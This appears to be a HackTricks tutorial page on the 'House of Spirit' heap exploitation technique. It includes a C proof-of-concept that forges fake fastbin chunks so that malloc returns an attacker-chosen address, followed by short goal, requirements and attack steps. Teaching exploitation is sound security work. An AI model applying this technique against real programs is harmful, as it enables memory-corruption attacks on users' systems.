House of Spirit

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Basic Information

Code

House of Spirit
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

// Code altered to add som prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit

struct fast_chunk {
  size_t prev_size;
  size_t size;
  struct fast_chunk *fd;
  struct fast_chunk *bk;
  char buf[0x20];               // chunk falls in fastbin size range
};

int main() {
  struct fast_chunk fake_chunks[2];   // Two chunks in consecutive memory
  void *ptr, *victim;

  ptr = malloc(0x30);

  printf("Original alloc address: %p\n", ptr);
  printf("Main fake chunk:%p\n", &fake_chunks[0]);
  printf("Second fake chunk for size: %p\n", &fake_chunks[1]);

  // Passes size check of "free(): invalid size"
  fake_chunks[0].size = sizeof(struct fast_chunk);

  // Passes "free(): invalid next size (fast)"
  fake_chunks[1].size = sizeof(struct fast_chunk);

  // Attacker overwrites a pointer that is about to be 'freed'
  // Point to .fd as it's the start of the content of the chunk
  ptr = (void *)&fake_chunks[0].fd;

  free(ptr);

  victim = malloc(0x30);
  printf("Victim: %p\n", victim);

  return 0;
}

Goal

  • Be able to add into the tcache / fast bin an arbitrary address so when calling malloc it gets used in a chunk

Requirements

  • This attack requires an attacker to be able to create a couple of fake fast chunks indicating correctly the size value of it and to overwrite a fast chunks of that size that it’s going to be freed, so the attackers chunk is actually the one that gets into the fast bin.

Attack

  • Create a fake chunk that bypasses security checks (you will need 2 fake chunks)

  • Before a pointer is freed, overwrite it with the fake chunk so thats the one taht gets into the bin

References

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Last updated